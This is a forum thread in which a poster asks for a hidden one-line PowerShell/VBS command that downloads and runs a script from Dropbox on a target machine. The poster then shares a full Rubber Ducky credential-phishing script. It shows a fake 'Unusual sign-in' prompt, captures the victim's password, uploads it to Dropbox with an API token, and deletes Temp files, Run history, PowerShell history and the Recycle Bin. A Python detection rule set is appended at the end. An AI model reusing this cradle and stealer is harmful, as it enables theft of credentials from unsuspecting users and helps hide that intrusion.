[HELP] Execute a powershell command through 'RUN' which runs a .vbs file located in a dropbox


Posted

I've got a powershell command here that does everything I want it to, but it only works for .ps1 files.
powershell -w h -c "iex ([Text.Encoding]::UTF8.GetString((iwr 'https://DROPBOX-LINK' -UseBasicParsing).Content))"

Been trying to find a command that is as concise as this that works for .vbs files, but cannot seem to find anything.
Any help on how to create a command that has the same functionality as the .ps1 version, but for .vbs, would be greatly appreciated!

Posted

Just a bit confused about the use case here.

What is the reason to why PowerShell can't be used on the target? Blocked? (Sounds a bit odd that PowerShell isn't allowed, but VBS is)

As I understand it you are trying to obtain the byte code of a string from a source on Dropbox, and this is what puzzles me. Why cross the stream for water? Why obtain a byte/hex based source from the internet, convert it to text, and then run the command that the text represents when the Ducky is already available on the target and able to type strings? Why download it as hex/byte and then convert it to text? In need of some sort of obfuscation? There must be reasons for this, but as long as it's a "black box", it's a bit difficult to suggest a valid alternative.

A thing that adds to the confusion is the title of the thread: "Execute a powershell command through 'RUN' which runs a .vbs file located in a dropbox". Why avoid using PowerShell (and use VBS) if it is still PowerShell that initiates it all? That means PowerShell isn't blocked. It might be monitored though, but in that case VBS could be as well; otherwise something's wrong in the cybersec design/architecture of the environment at hand.

Posted

Thank you for your response,

I got a PowerShell script on Dropbox that I require to be run hidden, without displaying any windows. I cannot run the entire PowerShell script through Ducky as it is quite long; for that reason it would take a lot of time to input the entire script. I've found that receiving the script outside of the Ducky would prove more efficient.

Initially, I attempted to run the PowerShell script on my Dropbox through a PowerShell command, which I couldn't get working without some kind of window popping up. As a workaround, I decided to experiment with running the script with VBS, which ended up working perfectly.

Now, I'm trying to get a command to run a VBS script on my Dropbox, which then runs a PowerShell script on my Dropbox (great workaround, I know). I need the command to be relatively short and in one line so I can execute it directly from 'run', which is the fastest method.

Hope that gives you a better idea of where I am at. 
Posted

I don't fully get the "run a VBS script on my dropbox" or "runs a PowerShell script on my dropbox". You can't execute things *on* Dropbox. You can of course obtain (download) things from Dropbox, but they have to be executed on the target device, not on Dropbox.

Looking at your previously posted "one-liner", I see that you execute PowerShell with "-w h", which is supposed to hide the PS window. But I guess that it's not enough for you since PowerShell pops up anyway for a short while and isn't actually fully hidden/stealth. Is that correct, or is the PowerShell window visible to you in any form during execution (i.e. for a longer while than just flashing up and then going away)?

However, you will most likely have issues getting it to execute totally silently. I mean, it won't be silent anyway since the Windows run dialog will show no matter what you try. The payload needs to trigger/kick off in some way; not sure how you would be able to pull that off without having something that ignites it all. You could try various lolbins and see if they can download and execute things all stealth, but I don't think so; most will pop up something that will be visible.

Posted

Yes, I meant downloaded from Dropbox and run on the target device.
The issue I encounter when I run it with PowerShell using "-w h" is that PowerShell minimises after the command is run, but never closes. (You can simply click on it to bring it back up.) This is not about the .ps1 script but rather the command that initiates it, from what I can understand, as this does not happen when it's run with VBS.

To put it in simpler words, running the .ps1 file directly with PowerShell causes the following: the Run window flashes, a PowerShell window appears and minimises, but never closes until the .ps1 script is complete.

None of those happen when the script is run with the VBS file.
I'm not quite sure why the PowerShell command causes the .ps1 file to execute with a visible window.
I could attach the code behind the .ps1 file I'm trying to execute if you'd like? It could help you get a better understanding of why that might be happening.

Posted

The script below generates an "Unusual login" prompt asking the victim for their password.
(This is a slightly modified version of Jackoby's Rubber Ducky "Credz-Plz" script.)

$DropBoxAccessToken = ""
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
<#
.NOTES 
    This generates the ui.prompt to harvest the credentials
#>
function Get-Creds {
do{
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
   if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
    [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
    Get-Creds
}
$creds = $cred.GetNetworkCredential() | fl
return $creds
  # ...
  $done = $true
} until ($done)
}
<#
.NOTES 
    This pauses the script until mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
    while (1) {
        $pauseTime = 3
        if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
            break
        }
        else {
            $o.SendKeys("{CAPSLOC}");Start-Sleep -Seconds $pauseTime
        }
    }
}
# This script repeatedly presses the capslock button (OUTDATED, IGNORE!)
# This function makes sure that capslock is turned off before ui.prompt appears
function Caps-Off {
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}
}
<#
.NOTES 
    This freezes the function until mouse movement is detected, in which after it activates the pop-up 
#>
Pause-Script
Caps-Off
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
$creds = Get-Creds
<#
.NOTES 
    This saves the gathered credentials to a file in the temp directory
#>
echo $creds >> $env:TMP\$FileName
<#
.NOTES 
    This uploads the gathered credentials file to the dropbox
#>
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
<#
.NOTES 
    This removes most traces of you, and evidence to prove you were there 
#>
# Deletes contents of Temp folder 
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Deletes run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Deletes powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
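As an added example from the detection side (not code from this thread or its author), a small Python triage over constructed process-creation command lines that flags the patterns this thread exposes: the hidden-window download cradle from the first post, a .vbs launched out of Temp, and the RunMRU / PSReadLine-history / Recycle-Bin cleanup at the end of the posted script. The rule names and sample lines are constructed for illustration.

```python
import re

# Constructed sample process command lines (not from any real host). The first
# three mirror the thread's patterns; the last two are benign control cases.
SAMPLE_EVENTS = [
    "powershell -w h -c \"iex ([Text.Encoding]::UTF8.GetString((iwr 'https://dl.example/x' -UseBasicParsing).Content))\"",
    "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\stage.vbs",
    "reg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f",
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "notepad.exe C:\\Users\\u\\notes.txt",
]

# Each rule is (name, compiled regex). Patterns follow the one-liner and the
# cleanup section of the script posted in this thread.
RULES = [
    ("hidden_window", re.compile(r"(?i)powershell(\.exe)?\b.*\s-w(indowstyle)?\s+h(idden)?\b")),
    ("download_cradle", re.compile(r"(?i)\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring)\b")),
    ("vbs_from_temp", re.compile(r"(?i)\b[wc]script(\.exe)?\b.*\\temp\\[^\s\"']+\.vbs\b")),
    ("runmru_wipe", re.compile(r"(?i)reg(\.exe)?\s+delete\b.*\\RunMRU\b")),
    ("ps_history_wipe", re.compile(r"(?i)remove-item\b.*HistorySavePath")),
    ("recycle_bin_wipe", re.compile(r"(?i)clear-recyclebin\b")),
]


def match_rules(cmdline):
    """Return the names of every rule that fires on one command line, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(events):
    """Map each command line to its rule hits, keeping only lines that hit at least one rule."""
    hits = {}
    for line in events:
        names = match_rules(line)
        if names:
            hits[line] = names
    return hits


if __name__ == "__main__":
    for line, names in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(names)}: {line[:70]}")
```

A hidden-window flag plus a download cradle in one command line, or any of the three wipe rules from a user shell, is a strong enough combination to alert on even when each pattern alone has benign uses.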
